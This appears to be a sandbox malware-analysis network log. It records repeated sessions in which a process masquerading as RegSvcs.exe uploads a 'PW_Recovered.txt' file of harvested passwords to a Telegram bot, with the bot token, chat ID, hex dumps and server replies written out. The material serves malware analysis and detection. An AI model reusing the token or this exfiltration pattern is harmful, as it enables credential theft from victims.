                                                                          2024-09-19 10:23:31 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12794,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          71192.168.2.561618149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:33 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf048596588d7
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:33 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 34 38 35 39 36 35 38 38 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf048596588d7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:33 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:33 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:33 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12795,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          72192.168.2.561619149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:34 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dced6e233a01b3
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:34 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 36 65 32 33 33 61 30 31 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dced6e233a01b3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:34 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:34 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:34 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12796,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          73192.168.2.561622149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:37 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf0ced33ec182
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:37 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 63 65 64 33 33 65 63 31 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf0ced33ec182Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:37 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:37 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:37 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12798,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          74192.168.2.561623149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:38 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcefb4e2f4aa1c
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:38 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 62 34 65 32 66 34 61 61 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcefb4e2f4aa1cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:38 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:38 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:38 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12799,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          75192.168.2.561626149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:41 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf15ba97e3e5d
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:41 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 31 35 62 61 39 37 65 33 65 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf15ba97e3e5dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:41 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:41 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:41 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12800,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          76192.168.2.561628149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:42 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf03acab5cb25
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:42 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 33 61 63 61 62 35 63 62 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf03acab5cb25Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:42 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:42 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:42 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12801,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          77192.168.2.561630149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:45 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf2cc95a004ba
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:45 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 63 63 39 35 61 30 30 34 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf2cc95a004baContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:46 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:46 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
